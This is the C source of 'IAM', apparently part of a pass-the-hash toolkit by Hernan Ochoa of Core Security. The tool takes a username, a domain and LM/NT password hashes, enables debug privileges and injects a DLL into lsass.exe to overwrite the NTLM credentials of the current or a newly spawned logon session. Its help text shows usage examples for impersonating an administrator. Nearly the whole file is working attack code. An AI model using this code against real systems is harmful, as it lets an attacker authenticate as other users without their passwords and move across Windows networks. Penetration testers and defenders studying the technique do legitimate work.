// $Id: iam.c,v 1.16 2008/06/12 19:41:51 hochoa Exp $

/*
 * iam.c
 *
 * Description: 
 *
 * Author: Hernan Ochoa (hochoa@coresecurity.com) (hernan@gmail.com)
 *
 * Copyright (c) 2007-2008 Hernan Ochoa, Buenos Aires, Argentina.
 * All rights reserved.
 *
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES
 * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY
DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES
 * RESULTING FROM THE USE OR MISUSE OF ANY RECOMPILATION OF THIS SOURCE
 * CODE NOT PROVIDED BY CORE SDI S.A.
 **/

#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <psapi.h>
#include "dllfuncs.h"
#include "findfuncs.h"
#include "..\whosthere\getopt.h"

static BOOL g_debugEnabled			= FALSE;
static BOOL g_HashParamsOK			= FALSE;

#define LSASRVDLL_WINXPSP2_FILEVERSION_MS		0x50001
#define LSASRVDLL_WINXPSP2_FILEVERSION_LS		0xA280BA0

#define LSASRVDLL_SERVER2003_FILEVERSION_MS		0x50002
#define LSASRVDLL_SERVER2003_FILEVERSION_LS		0xECE0000

#define LSASRVDLL_VISTA_FILEVERSION_MS			0x60000
#define LSASRVDLL_VISTA_FILEVERSION_LS			0x17704002


typedef (*CreateProcessWithLogonWFunc)(LPCWSTR lpUsername, LPCWSTR lpDomain, LPCWSTR lpPassword, DWORD dwLogonFlags, LPCWSTR lpApplicationName, LPWSTR lpCommandLine, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCWSTR lpCurrentDirectory, LPSTARTUPINFOW lpStartupInfo, LPPROCESS_INFORMATION lpProcessInfo);

DWORD GetLogonID(void);
BOOL EnableDebugPrivs(void);
DWORD GetLSASSPid(void);
void ParseCmdline(char *cmdline, char* out_username, char* out_domain, char* out_lmhashstr, char* out_nthashstr);
BOOL processAddrsFromUser( char* pszString, AddressesGroup* outAddrGroup );
BOOL createProcessAndGetSessionID(char *pszUsername, char *pszDomain, char* pszCmdline, DWORD* pSessionID);

BOOL createProcessAndGetSessionID(char *pszUsername, char *pszDomain, char* pszCmdline, DWORD* pSessionID)
{
char *pwd = "\x00\x00\x00\x00";
char *Wusername;
char *Wdomain;
char *Wcmdline;
DWORD ddNeededSize;
STARTUPINFOW si;
PROCESS_INFORMATION pi;
CreateProcessWithLogonWFunc create;
BOOL bRet;
HANDLE hProc;
TOKEN_STATISTICS tokenStats;

	if( pszUsername == NULL || pszDomain == NULL || pszCmdline == NULL || pSessionID == NULL )
		return FALSE;

	create = NULL;
	create = (CreateProcessWithLogonWFunc) GetProcAddress(LoadLibrary("advapi32.dll"), "CreateProcessWithLogonW");
	if( create == NULL ) {
		printf("Can't find CreateProcessWithLogonW\n");
		return FALSE;
	}

	Wusername = (char*)malloc( (strlen(pszUsername)+4)*sizeof(wchar_t));
	Wdomain = (char*)malloc( (strlen(pszDomain)+4)*sizeof(wchar_t));
	Wcmdline = (char*)malloc( (strlen(pszCmdline)+4)*sizeof(wchar_t));

	if( Wusername==NULL || Wdomain == NULL || Wcmdline == NULL )
		return FALSE;

	if( MultiByteToWideChar(
			CP_ACP,
			0, 
			pszUsername, -1,
			(LPWSTR)Wusername, strlen(pszUsername)+1) == 0 ) 
	{

			printf("Error\n");

			free(Wusername);
			free(Wdomain);
			free(Wcmdline);
			return FALSE;
	}


	if( MultiByteToWideChar(
			CP_ACP, 0,
			pszDomain, -1,
			(LPWSTR)Wdomain, strlen(pszDomain)+1) == 0 )
	{

			free(Wusername);
			free(Wdomain);
			free(Wcmdline);
			return FALSE;
	
	}


	if( MultiByteToWideChar(CP_ACP, 0,
			pszCmdline, -1,
			(LPWSTR)Wcmdline, strlen(pszCmdline)+1) == 0 ) 
	{

			free(Wusername);
			free(Wdomain);
			free(Wcmdline);
			return FALSE;
	}

	


	ZeroMemory( &si, sizeof(si));
	ZeroMemory( &pi, sizeof(pi));
	si.cb = sizeof(si);

	bRet = create(
			(LPCWSTR)Wusername,
			(LPCWSTR)Wdomain,
			(LPCWSTR)pwd,
			2, /* LOGON_CREDENTIALS_ONLY */
			NULL,
			(LPWSTR)Wcmdline,
			CREATE_NEW_CONSOLE, 
			NULL, NULL,
			&si,
			&pi);

	if( bRet == FALSE ) {
			printf("ERROR: CreateProcessWithLogonW\n");
			if(Wusername) free(Wusername);
			if(Wdomain) free(Wdomain);
			if(Wcmdline) free(Wcmdline);
			return FALSE;
	}

	bRet = OpenProcessToken(
			pi.hProcess,
			TOKEN_READ, 
			&hProc);

	
	if( bRet == FALSE ) {
		if(Wusername) free(Wusername);
		if(Wdomain) free(Wdomain);
		if(Wcmdline) free(Wcmdline);
		TerminateProcess( pi.hProcess, 0);
		return FALSE;
	}

	bRet = GetTokenInformation( 
			hProc,
			TokenStatistics,
			&tokenStats,
			sizeof(tokenStats),
			&ddNeededSize);

	if( bRet == FALSE ) {
		CloseHandle( hProc );
		if(Wusername) free(Wusername);
		if(Wdomain) free(Wdomain);
		if(Wcmdline) free(Wcmdline);
		TerminateProcess( pi.hProcess, 0);
		//printf("Error in GetTokenInformation\n");
		return FALSE;
	}


	*pSessionID = (DWORD) tokenStats.AuthenticationId.LowPart;
	CloseHandle( hProc );

	if(Wusername) free(Wusername);
	if(Wdomain) free(Wdomain);
	if(Wcmdline) free(Wcmdline);

	return TRUE;	
}



void ParseCmdline(char *cmdline, char* out_username, char* out_domain, char* out_lmhash, char* out_nthash)
{
int sep_count;
char *tmp;
char username[1024], domain[1024], lmhashstr[32], nthashstr[32];
int n;

	if(cmdline == NULL || out_username == NULL || out_domain == NULL || out_lmhash == NULL || out_nthash == NULL) {
		printf("Error in cmdline!. Bye!.\n");
		exit(0);
	}

	sep_count = 0;
	tmp = cmdline;
//	printf("%p\n", tmp);

	// strchr is executed one more time that needed, but oh well
	while(  ((tmp=strchr( tmp, ':')) != NULL) ) {

//		printf("%p\n", tmp);	
		tmp++;
		sep_count++;
		if( sep_count > 3 ) {
			printf("Error in cmdline!. Credentials format is wrong! too many ':' characters!\n");
			exit(0);
		}


	}

	if( sep_count < 3 ) {
		printf("Error in cmdline!. Credentials format is wrong! too few ':' characters!\n");
		exit(0);
	}

//	printf("count: %d\n", sep_count);

	tmp = cmdline;
	n = 0;
	while( *tmp != ':') {
	
		username[n++] = *tmp++;
		if( n > sizeof(username)-2) {
			printf("username is too long!.\n");
			exit(0);
		}

	}

	if( n < 1 ) {
		printf("username wrong format!.\n");
		exit(0);
	}
	username[ sizeof(username)-1 ] = '\0';
	username[ n ] = '\0';
//	puts(username);
	// careful...
	strcpy( out_username, username);
	
	n = 0;
	tmp++;
	while( *tmp != ':') {
		domain[n++] = *tmp++;
		if( n > sizeof(domain)-2) {
			printf("domain is too long!.\n");
			exit(0);
		}
	}

	if( n < 1 ) {
		printf("domain wrong format!.\n");
		exit(0);
	}

	domain[ sizeof(domain)-1] = '\0';
	domain[ n ] = '\0';
//	puts(domain);
	// careful..
	strcpy( out_domain, domain);

	n = 0;
	tmp++;
	while( *tmp != ':') {
		lmhashstr[n++] = *tmp++;
		if( n > sizeof(lmhashstr)) {
			printf("lmhash is too long!.\n");
			exit(0);
		}
	}

	if( n != 32 ) {
		printf("lmhash wrong format!.\n");
		exit(0);
	}

//	for(n=0; n<32; n++) {
//		printf("%c", lmhashstr[n]);
//	}
//	printf("\n");
	// Careful.. 
	memcpy( out_lmhash, lmhashstr, 32);

	n = 0;
	tmp++;
	while( *tmp != '\x00' || *tmp == ' ') {
		nthashstr[n++] = *tmp++;
		if( n > sizeof(nthashstr)) {
			printf("nthash is too long!.\n");
			exit(0);
		}
	}

	if( n != 32 ) {
		printf("nthash wrong format!.\n");
		exit(0);
	}

//	for(n=0; n<32; n++) {
//		printf("%c", nthashstr[n]);
//	}
//	printf("\n");
	// Careful...
	memcpy( out_nthash, nthashstr, 32);

}

DWORD GetPidByName( char* szProcessName )
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;

	if( !szProcessName ) return 0;

	// Take a snapshot of all processes in the system.
	hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
	if( hProcessSnap == INVALID_HANDLE_VALUE )
	{
		return 0;
	}

	// Set the size of the structure before using it.
	pe32.dwSize = sizeof( PROCESSENTRY32 );

	// Retrieve information about the first process,
	// and exit if unsuccessful
	if( !Process32First( hProcessSnap, &pe32 ) )
	{
		CloseHandle( hProcessSnap );          // clean the snapshot object
		return 0;
	}

	// Now walk the snapshot of processes, and
	// display information about each process in turn
	do
	{

		if( strstr( pe32.szExeFile, szProcessName) )
		{
			CloseHandle( hProcessSnap );
			return (DWORD)pe32.th32ProcessID;
		}


	} while( Process32Next( hProcessSnap, &pe32 ) );

	CloseHandle( hProcessSnap );
	return 0;
}


BOOL EnableDebugPrivs()
{
	HANDLE hToken = 0;
	TOKEN_PRIVILEGES newPrivs;
	BOOL bStatus = FALSE;

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,
		&hToken))
	{
		goto clean;
    }

	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &newPrivs.Privileges[0].Luid))
    {
		goto clean;
	}

	newPrivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	newPrivs.PrivilegeCount = 1;
    
	if (!AdjustTokenPrivileges(hToken, FALSE, &newPrivs, 0, NULL, NULL))
	{
		goto clean;
	}

	bStatus = TRUE;

clean:
	if (hToken)
	{
		CloseHandle (hToken);
	}

	return bStatus;	
}

// Return: 0 = error
DWORD GetLogonID(void)
{
	TOKEN_STATISTICS TokenStats;
	HANDLE hToken;
	BOOL bStatus;
	DWORD nBytes;
	DWORD logonIDlow;
	DWORD logonIDhigh;


	logonIDlow = logonIDhigh = 0;
	bStatus = OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
	if (bStatus)
	{
		bStatus = GetTokenInformation(hToken, TokenStatistics,
			&TokenStats, sizeof(TokenStats), &nBytes);
		if (bStatus)
		{
			logonIDlow = TokenStats.AuthenticationId.LowPart;
			logonIDhigh = TokenStats.AuthenticationId.HighPart;
			bStatus = TRUE;
		}
	}

	
	return logonIDlow;
}

BOOL processAddrsFromUser( char* pszString, AddressesGroup* outAddrGroup )
{
char szSuppliedAddrs[100];
unsigned int uColonCount;
char *ptr;
unsigned int uNum, n;

	if( !pszString ) return FALSE;

	// copy <string> from -a <string> to buffer
	ZeroMemory( szSuppliedAddrs, sizeof(szSuppliedAddrs) );
	strncpy( szSuppliedAddrs, pszString, sizeof(szSuppliedAddrs)-1 );
	szSuppliedAddrs[ sizeof(szSuppliedAddrs) -1 ] = '\x00';	

	// If there are not 5 ':'s, then the format of the supplied addresses is wrong
	uColonCount = 0;
	for(n=0; n<strlen(szSuppliedAddrs); n++) {
		if( szSuppliedAddrs[n] == ':' ) 
		uColonCount++;
	}

	if( uColonCount != 5 ) {
		return FALSE;
	}

	// now obtain the 6 addresses
	uColonCount = 0;
	ptr = strtok( szSuppliedAddrs, ":");
	if( ptr == NULL ) {
		return FALSE;
	}

	uNum = strtol( ptr, NULL, 16);
	outAddrGroup->pAddCredential = (PBYTE)uNum;
	n=1;
	while ( (ptr = strtok(NULL, ":")) != NULL )
	{
		uNum = strtol(ptr, NULL, 16 );
		switch(n) {
			case 1:
				outAddrGroup->pEncryptMemory = (PBYTE)uNum;
				break;
			case 2:
				outAddrGroup->pFeedback = (PBYTE)uNum;
				break;
			case 3:
				outAddrGroup->pDESKey = (PBYTE)uNum;
				break;
			case 4:
				outAddrGroup->pLogonSessionList = (PBYTE)uNum;
				break;
			case 5:
				outAddrGroup->pLogonSessionListCount = (PBYTE)uNum;
				break;
			default:
				return FALSE;
		}
		n++;
	}
	if( n != 6 ) {
		return FALSE;
	}


//	printf("%.8Xh\n", outAddrGroup->pAddCredential);
//	printf("%.8Xh\n", outAddrGroup->pEncryptMemory);
//	printf("%.8Xh\n", outAddrGroup->pFeedback);
//	printf("%.8Xh\n", outAddrGroup->pDESKey);
//	printf("%.8Xh\n", outAddrGroup->pLogonSessionList);
//	printf("%.8Xh\n", outAddrGroup->pLogonSessionListCount);


	return TRUE;

}


void banner(void)
{

	printf("IAM v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies\n");

}

void help(void)
{
	printf("This tool changes the current session NTLM credentials.\n");
	printf("options:\n");
	printf("\t-h\t\tusername:domainname:LMhash:NThash\n");
	printf("\t-B\t\toptional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter.");
	printf(" IAM.EXE will try to locate some memory locations instead of using hard-coded values.\n");
	printf("\t-H\t\tthis help.\n");
	printf("\t-D\t\tenable debug info.\n");
	printf("\t-a\t\tspecify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR (WARNING!: if you use the wrong values the system may crash)\n");
	printf("\t-r\t\t<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)\n\n");
	printf("\nExamples:\n");
	printf("\t\tiam.exe -h administrator:mydomain:0102030405060708090A0B0C0D0E0F10:0102030405060708090A0B0C0D0E0F10\n");
	printf("\nor:\n\n");
	printf("\t\tiam.exe -b -h administrator:mydomain:0102030405060708090A0B0C0D0E0F10:0102030405060708090A0B0C0D0E0F10\n");

}



int main(int argc, char *argv[])
{
DWORD dwLogonID, dwLSASSPID;
BOOL bRet;
BYTE LMHash[16], NTHash[16];
char LMHashstring[32], NTHashstring[32];
DWORD dwHandle;
DWORD dwFileInfoSize;
PBYTE pbFileInfoData;
char windowsDirectory[MAX_PATH];
char lsasrvPath[2048];
VS_FIXEDFILEINFO *pFixedFileInfo;
unsigned int uFixedFileInfoSize;
char szUsername[1024], szDomainName[1024];
int f, j, i;
char tmp1[10];
BOOL bFindFuncs, buseSuppliedAddrs;
AddressesGroup currentAddrGroup;
char szRunCommand[8192];



	// Show banner
	banner();

	// Is IAMDLL.DLL in the same directory? if it is not,
	// throw an error an exit.
	if( !GetFileAttributes(".\\iamdll.dll") ) {
		printf("Error: iamdll.dll is not in the current directory!.\n");
		exit(0);
	}

	// do not find functions by default
	bFindFuncs = FALSE;
	buseSuppliedAddrs = FALSE;

	memset( szUsername, '\0', sizeof(szUsername) );
	memset( szDomainName, '\0', sizeof(szDomainName) );
	ZeroMemory( szRunCommand, sizeof(szRunCommand) );

	// check parameters
	while(1) {
		unsigned int c = getopt(argc, argv, "-DbBh:Ha:r:");
		if( c == -1 ) break;
		
		switch( c ) {
			case 'D': g_debugEnabled = 1;
				break;
			case 'r':
				  ZeroMemory( szRunCommand, sizeof( szRunCommand ) );
				  strncpy( szRunCommand, optarg, sizeof(szRunCommand)-1 );
				  szRunCommand[sizeof(szRunCommand)-1] = '\x00';
				 break;
			case 'a':
				// process user supplied addresses
				buseSuppliedAddrs = processAddrsFromUser( optarg, &currentAddrGroup );
				if( buseSuppliedAddrs == FALSE ) {
					printf("Wrong format of supplied addresses!");
					exit(0);
				}
				break;
			case 'h':
				ParseCmdline( (char*)optarg, szUsername, szDomainName, LMHashstring, NTHashstring );
				g_HashParamsOK = TRUE;
				break;
			case 'b':
			case 'B':
				bFindFuncs = TRUE;
				break;
			
			case 'H':
				help();
				return 0;
			
			default:
				help();
				return 0;
				
			}
			
	}


	if( g_HashParamsOK == FALSE) {
			
			printf("You didn't supply credentials!\n");
			help();
			return 0;
			
		}
	

	if( bFindFuncs == TRUE && buseSuppliedAddrs == TRUE) {

		printf("You can't use -B and -a at the same time!\n");
		return 0;

	}

	// convert ascii to hex
	for( f=0, j=0 ; f<32; f+=2, j++) {
              tmp1[0] = LMHashstring[f];
              tmp1[1] = LMHashstring[f+1];
              tmp1[2] = '\0';
              sscanf(tmp1, "%X", &i);
              LMHash[j] = (unsigned char)i;

              tmp1[0] = NTHashstring[f];
              tmp1[1] = NTHashstring[f+1];
              tmp1[2] = '\0';
              sscanf(tmp1, "%X", &i);
              NTHash[j] = (unsigned char)i;


	}
	
	printf("Parameters:\n");
	printf("Username: %s\n", szUsername);
        printf("Domainname: %s\n", szDomainName);
	printf("LM hash: ");
	for(j=0; j<16; j++) {
			printf("%.2X", (unsigned int)LMHash[j]);
	}
	printf("\nNT hash: ");
	for(j=0; j<16; j++) {
			printf("%.2X", (unsigned int)NTHash[j]);
	}
	printf("\n");
	printf("Run: %s\n", szRunCommand);


	if( GetSystemWindowsDirectory( windowsDirectory, sizeof(windowsDirectory)) == 0) {
			printf("Cannot Obtain Windows Directory!.\n");
			exit(0);
	}

	windowsDirectory[MAX_PATH-1] = '\0';
	lsasrvPath[ sizeof(lsasrvPath)-1 ] = '\0';
	_snprintf(lsasrvPath,sizeof(lsasrvPath)-1,"%s\\system32\\lsasrv.dll", windowsDirectory);
	lsasrvPath[ sizeof(lsasrvPath)-1 ] = '\0';

	if( g_debugEnabled == 1) 
		printf("LSASRV.DLL Location: %s\n", lsasrvPath);

	dwFileInfoSize = GetFileVersionInfoSize(lsasrvPath,&dwHandle);
	if( dwFileInfoSize == 0 ) {
			printf("Cannot get LSASRV.DLL Version Size Info.\n");
			exit(0);
	}

	pbFileInfoData = NULL;
	pbFileInfoData = (PBYTE) malloc( dwFileInfoSize );
	if( pbFileInfoData == NULL ) {
		printf("Cannot allocate buffer to get LSASRV.DLL Info.\n");
		exit(0);
	}

	bRet = GetFileVersionInfo( lsasrvPath,
				dwHandle,
				dwFileInfoSize,
				pbFileInfoData );

	if( bRet == FALSE ) {
			printf("Cannot get LSASRV.DLL VersionInfo!.\n");
			if( pbFileInfoData != NULL ) free( pbFileInfoData );
			exit(0);
	}


	bRet = VerQueryValue( pbFileInfoData, "\\", &pFixedFileInfo, &uFixedFileInfoSize );
	if( bRet == FALSE || uFixedFileInfoSize == 0 ) {
		printf("Cannot obtain version info from info block!.\n");
		exit(0);
	}

	// display LSASRV.DLL version
	printf("LSASRV.DLL version: %.8Xh.%8Xh\n", pFixedFileInfo->dwFileVersionMS, pFixedFileInfo->dwFileVersionLS);

	// Let's check to see if it is ok to work with this DLL
	printf("Checking LSASRV.DLL....");
	if( bFindFuncs == FALSE && buseSuppliedAddrs == FALSE) {
		bRet = FALSE;
		if( pFixedFileInfo->dwFileVersionMS == LSASRVDLL_WINXPSP2_FILEVERSION_MS 
				&& pFixedFileInfo->dwFileVersionLS == LSASRVDLL_WINXPSP2_FILEVERSION_LS ) {
			bRet = TRUE;
		}

		if( pFixedFileInfo->dwFileVersionMS == LSASRVDLL_SERVER2003_FILEVERSION_MS 
				&& pFixedFileInfo->dwFileVersionLS == LSASRVDLL_SERVER2003_FILEVERSION_LS ) {
			bRet = TRUE;
		}

		if( pFixedFileInfo->dwFileVersionMS == LSASRVDLL_VISTA_FILEVERSION_MS 
				&& pFixedFileInfo->dwFileVersionLS == LSASRVDLL_VISTA_FILEVERSION_LS ) {
			bRet = TRUE;
		}

		if( bRet == FALSE ) {
			printf("Unknown LSASRV.DLL.\n");
			exit(0);
		}

		printf("OK!\n");
	}
	else if( bFindFuncs == TRUE) {
		printf("skipped. (-B was specified).\n");
		printf("Trying to obtain addresses...");
		if( findFuncs( &currentAddrGroup ) == FALSE ) {
			printf("Failed! (AC = %.8X, EM = %.8X)\n", currentAddrGroup.pAddCredential, currentAddrGroup.pEncryptMemory);
			exit(0);
		} else {

			if( currentAddrGroup.pAddCredential == VALUE_UNKNOWN ||
				currentAddrGroup.pEncryptMemory == VALUE_UNKNOWN ||
				currentAddrGroup.pFeedback == VALUE_UNKNOWN ||
				currentAddrGroup.pDESKey == VALUE_UNKNOWN ||
				currentAddrGroup.pLogonSessionList == VALUE_UNKNOWN ||
				currentAddrGroup.pLogonSessionListCount == VALUE_UNKNOWN ) {
			printf("Failed! (the address group was not correctly identified!. email the author!)\n");
			exit(0);
			}

		printf("Ok! (AC = %.8X, EM = %.8X)\n", currentAddrGroup.pAddCredential, currentAddrGroup.pEncryptMemory);
		}
	}
	else if( buseSuppliedAddrs == TRUE ) {
		printf("Ok! using supplied addresses.\n");
		bFindFuncs = FALSE;
	}
	else {
		printf("this is not hapenning..paranoid android\n");
		exit(0);
	}


	EnableDebugPrivs();

	// If a command with the -r option was specified, run that command and get the session ID
	// of the new session under which the program is running to change the credentials of that session
	// instead of the credentials of the current session
	if( strlen(szRunCommand) > 0 ) {

		if( createProcessAndGetSessionID(szUsername,
				       	szDomainName,
					szRunCommand,
				       	&dwLogonID) 
					== FALSE ) 
		{
			printf("cannot run the specified program!");
			exit(0);

		}

	}
	else {
		dwLogonID = GetLogonID();
	}

	dwLSASSPID = GetPidByName("lsass.exe");
	
	if( g_debugEnabled == 1 ) {
		printf("LOGONID: %.8xh\n", dwLogonID );
		printf("LSASS_PID: %.8xh\n", dwLSASSPID );
	}
	
	if( buseSuppliedAddrs == TRUE ) {
		bRet = InjectDll(dwLSASSPID, dwLogonID, 0, bFindFuncs, pFixedFileInfo->dwFileVersionMS, pFixedFileInfo->dwFileVersionLS, szUsername, szDomainName, LMHash, NTHash, &currentAddrGroup);
	} else {
		bRet = InjectDll(dwLSASSPID, dwLogonID, 0, bFindFuncs, pFixedFileInfo->dwFileVersionMS, pFixedFileInfo->dwFileVersionLS, szUsername, szDomainName, LMHash, NTHash, NULL);

	}


	if( bRet == TRUE )
	{
		printf("The current logon credentials were sucessfully changed!");
	}
	else
	{
		printf("An error was encountered when trying to change the current logon credentials!.");
	}
	
}

